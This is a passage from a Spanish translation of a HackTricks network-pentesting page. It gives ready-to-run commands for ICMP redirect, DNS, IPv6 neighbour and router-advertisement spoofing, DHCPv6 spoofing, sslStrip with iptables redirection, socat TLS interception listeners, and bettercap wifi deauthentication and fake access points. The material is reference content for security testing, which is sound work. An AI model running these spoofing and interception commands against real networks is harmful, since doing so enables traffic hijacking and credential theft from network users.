****Coly también soporta la captura de transmisiones EIGRP e inyección de paquetes para manipular la configuración de enrutamiento. Para más información sobre cómo atacarlo con Coly, consulta Network Security Assessment: Know Your Network (3rd edition).
OSPF
La mayoría de las implementaciones de Open Shortest Path First (OSPF) utilizan MD5 para proporcionar autenticación entre enrutadores. Loki y John the Ripper pueden capturar y atacar hashes MD5 para revelar la clave, que luego puede usarse para anunciar nuevas rutas. Los parámetros de la ruta se establecen usando la pestaña Injection, y la clave se configura bajo Connection.
Para más información sobre cómo atacar este protocolo, consulta el libro Network Security Assessment: Know Your Network (3rd edition).
Otras Herramientas y Fuentes Genéricas
- Above: Herramienta para escanear tráfico de red y encontrar vulnerabilidades
- Puedes encontrar más información sobre ataques de red aquí. (TODO: Leerlo todo y añadir nuevos ataques si los hay)
Spoofing
El atacante configura todos los parámetros de red (GW, IP, DNS) del nuevo miembro de la red enviando respuestas DHCP falsas.
Ettercap
yersinia dhcp -attack 2 #More parameters are needed
ARP Spoofing
Consulte la sección anterior.
ICMPRedirect
ICMP Redirect consiste en enviar un paquete ICMP tipo 1 código 5 que indica que el atacante es la mejor ruta para alcanzar una IP. Entonces, cuando la víctima quiere contactar la IP, enviará el paquete a través del atacante.
Ettercap
icmp_redirect
hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5]
Suplantación de DNS
El atacante resolverá algunos (o todos) los dominios que la víctima solicite.
set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on
Configurar DNS propio con dnsmasq
apt-get install dnsmasqecho "addn-hosts=dnsmasq.hosts" > dnsmasq.conf #Create dnsmasq.confecho "127.0.0.1 domain.example.com" > dnsmasq.hosts #Domains in dnsmasq.hosts will be the domains resolved by the Dsudo dnsmasq -C dnsmasq.conf --no-daemon
dig @localhost domain.example.com # Test the configured DNS
Puertas de enlace locales
A menudo existen múltiples rutas hacia sistemas y redes. Al construir una lista de direcciones MAC dentro de la red local, utilice gateway-finder.py para identificar hosts que admiten reenvío IPv4.
root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git
root@kali:~# cd gateway-finder/
root@kali:~# arp-scan -l | tee hosts.txt
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.0.0.100 00:13:72:09:ad:76 Dell Inc.
10.0.0.200 00:90:27:43:c0:57 INTEL CORPORATION
10.0.0.254 00:08:74:c0:40:ce Dell Computer Corp.
root@kali:~/gateway-finder# ./gateway-finder.py -f hosts.txt -i 209.85.227.99
gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder
[+] Using interface eth0 (-I to change)
[+] Found 3 MAC addresses in hosts.txt
[+] We can ping 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]
[+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]
Suplantación de LLMNR, NBT-NS y mDNS
Los sistemas de Microsoft utilizan la Resolución de Nombres Multicast de Ámbito Local (LLMNR) y el Servicio de Nombres NetBIOS (NBT-NS) para la resolución local de hosts cuando las consultas DNS fallan. Apple Bonjour y las implementaciones de configuración cero de Linux utilizan DNS Multicast (mDNS) para descubrir sistemas dentro de una red. Estos protocolos son no autenticados y transmiten mensajes a través de UDP; por lo tanto, los atacantes pueden explotarlos para dirigir a los usuarios a servicios maliciosos.
Puedes suplantar servicios que son buscados por los hosts utilizando Responder para enviar respuestas falsas.
Lee aquí más información sobre cómo suplantar servicios con Responder.
Suplantación de WPAD
Muchos navegadores utilizan el Descubrimiento Automático de Proxy Web (WPAD) para cargar la configuración de proxy desde la red. Un servidor WPAD proporciona la configuración de proxy del cliente a través de una URL específica (por ejemplo, http://wpad.example.org/wpad.dat) al ser identificado a través de cualquiera de los siguientes:
- DHCP, utilizando una entrada de código 25234
- DNS, buscando el nombre de host wpad en el dominio local
- Microsoft LLMNR y NBT-NS (en caso de fallo de la consulta DNS)
Responder automatiza el ataque WPAD—ejecutando un proxy y dirigiendo a los clientes a un servidor WPAD malicioso a través de DHCP, DNS, LLMNR y NBT-NS.
Lee aquí más información sobre cómo suplantar servicios con Responder.
Suplantación de dispositivos SSDP y UPnP
Puedes ofrecer diferentes servicios en la red para intentar engañar a un usuario para que introduzca algunas credenciales en texto plano. Más información sobre este ataque en Suplantación de Dispositivos SSDP y UPnP.
Suplantación de Vecinos IPv6
Este ataque es muy similar al Spoofing ARP pero en el mundo IPv6. Puedes hacer que la víctima piense que la IPv6 del GW tiene la MAC del atacante.
sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested
sudo fake_advertise6 -r -w 2 eth0 <Router_IPv6> #This option will send the Neighbor Advertisement packet every 2 seconds
Spoofing/Flooding de Anuncios de Router IPv6
Algunos sistemas operativos configuran por defecto la puerta de enlace a partir de los paquetes RA enviados en la red. Para declarar al atacante como router IPv6 puedes usar:
sysctl -w net.ipv6.conf.all.forwarding=1 4
ip route add default via <ROUTER_IPv6> dev wlan0
fake_router6 wlan0 fe80::01/16
Suplantación de DHCP IPv6
Por defecto, algunos sistemas operativos intentan configurar el DNS leyendo un paquete DHCPv6 en la red. Entonces, un atacante podría enviar un paquete DHCPv6 para configurarse a sí mismo como DNS. El DHCP también proporciona una IPv6 a la víctima.
dhcp6.spoof on
dhcp6.spoof.domains <list of domains>
mitm6
HTTP (página falsa e inyección de código JS)
Ataques en Internet
sslStrip
Básicamente, lo que hace este ataque es, en caso de que el usuario intente acceder a una página HTTP que está redirigiendo a la versión HTTPS. sslStrip mantendrá una conexión HTTP con el cliente y una conexión HTTPS con el servidor, por lo que podrá olfatear la conexión en texto plano.
apt-get install sslstrip
sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k
#iptables --flush
#iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT
Más información aquí.
sslStrip+ y dns2proxy para evadir HSTS
La diferencia entre sslStrip+ y dns2proxy frente a sslStrip es que redirigirán, por ejemplo, www.facebook.com a wwww.facebook.com (nótese la "w" extra) y establecerán la dirección de este dominio como la IP del atacante. De esta manera, el cliente se conectará a wwww.facebook.com (el atacante) pero entre bastidores sslstrip+ mantendrá la conexión real a través de https con www.facebook.com.
El objetivo de esta técnica es evitar HSTS porque wwww.facebook.com no se guardará en la caché del navegador, por lo que el navegador será engañado para realizar la autenticación de facebook en HTTP.
Tenga en cuenta que para realizar este ataque, la víctima debe intentar acceder inicialmente a http://www.faceook.com y no a https. Esto se puede hacer modificando los enlaces dentro de una página http.
Más información aquí, aquí y aquí.
sslStrip o sslStrip+ ya no funcionan. Esto se debe a que hay reglas de HSTS preguardadas en los navegadores, por lo que incluso si es la primera vez que un usuario accede a un dominio "importante", lo hará a través de HTTPS. Además, tenga en cuenta que las reglas preguardadas y otras reglas generadas pueden usar la bandera includeSubdomains
por lo que el ejemplo de wwww.facebook.com mencionado anteriormente ya no funcionará, ya que facebook.com utiliza HSTS con includeSubdomains
.
TODO: easy-creds, evilgrade, metasploit, fábrica
TCP escucha en puerto
sudo nc -l -p 80
socat TCP4-LISTEN:80,fork,reuseaddr -
TCP + SSL escucha en puerto
Generar claves y certificado autofirmado
FILENAME=server
# Generate a public/private key pair:
openssl genrsa -out $FILENAME.key 1024
# Generate a self signed certificate:
openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt
# Generate the PEM file by just appending the key and certificate files:
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem
Escuchar utilizando certificado
sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -
Escuchar usando certificado y redirigir a los hosts
sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 openssl-connect:[SERVER]:[PORT],verify=0
A veces, si el cliente verifica que la CA es válida, podrías servir un certificado de otro nombre de host firmado por una CA.
Otra prueba interesante es servir un certificado del nombre de host solicitado pero autofirmado.
Otras cosas para probar es intentar firmar el certificado con un certificado válido que no sea una CA válida. O usar la clave pública válida, forzar el uso de un algoritmo como Diffie-Hellman (uno que no necesite descifrar nada con la clave privada real) y cuando el cliente solicite una prueba de la clave privada real (como un hash) enviar una prueba falsa y esperar que el cliente no verifique esto.
Bettercap
# Events
events.stream off #Stop showing events
events.show #Show all events
events.show 5 #Show latests 5 events
events.clear
# Ticker (loop of commands)
set ticker.period 5; set ticker.commands "wifi.deauth DE:AD:BE:EF:DE:AD"; ticker on
# Caplets
caplets.show
caplets.update
# Wifi
wifi.recon on
wifi.deauth BSSID
wifi.show
# Fake wifi
set wifi.ap.ssid Banana
set wifi.ap.bssid DE:AD:BE:EF:DE:AD
set wifi.ap.channel 5
set wifi.ap.encryption false #If true, WPA2
wifi.recon on; wifi.ap
Notas sobre Descubrimiento Activo
Tenga en cuenta que cuando se envía un paquete UDP a un dispositivo que no tiene el puerto solicitado, se envía un ICMP (Puerto Inalcanzable).
Descubrimiento ARP
Los paquetes ARP se utilizan para descubrir qué IPs se están utilizando dentro de la red. La PC tiene que enviar una solicitud para cada dirección IP posible y solo responderán las que estén en uso.
mDNS (DNS multicast)
Bettercap envía una solicitud mDNS (cada X ms) preguntando por _services_.dns-sd._udp.local la máquina que ve este paquete generalmente responde a esta solicitud. Luego, solo busca máquinas que respondan a "services".
Herramientas
- Avahi-browser (--all)
- Bettercap (net.probe.mdns)
- Responder
NBNS (Servidor de Nombres NetBios)
Bettercap envía paquetes de difusión al puerto 137/UDP preguntando por el nombre "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA".
SSDP (Protocolo de Descubrimiento de Servicios Simple)
Bettercap envía paquetes SSDP de difusión buscando todo tipo de servicios (Puerto UDP 1900).
WSD (Descubrimiento de Servicios Web)
Bettercap envía paquetes WSD de difusión buscando servicios (Puerto UDP 3702).
Referencias
Consejo para cazar bugs: regístrate en Intigriti, una plataforma premium de caza de bugs creada por hackers, para hackers. ¡Únete a nosotros en https://go.intigriti.com/hacktricks hoy mismo y comienza a ganar recompensas de hasta $100,000!
{% embed url="https://go.intigriti.com/hacktricks" %}
Aprende a hackear AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!
Otras formas de apoyar a HackTricks:
- Si quieres ver a tu empresa anunciada en HackTricks o descargar HackTricks en PDF revisa los PLANES DE SUSCRIPCIÓN!
- Consigue el merchandising oficial de PEASS & HackTricks
- Descubre La Familia PEASS, nuestra colección de NFTs exclusivos
- Únete al 💬 grupo de Discord o al grupo de telegram o sigue a Twitter 🐦 @carlospolopm.
- Comparte tus trucos de hacking enviando PRs a los repositorios de github HackTricks y HackTricks Cloud.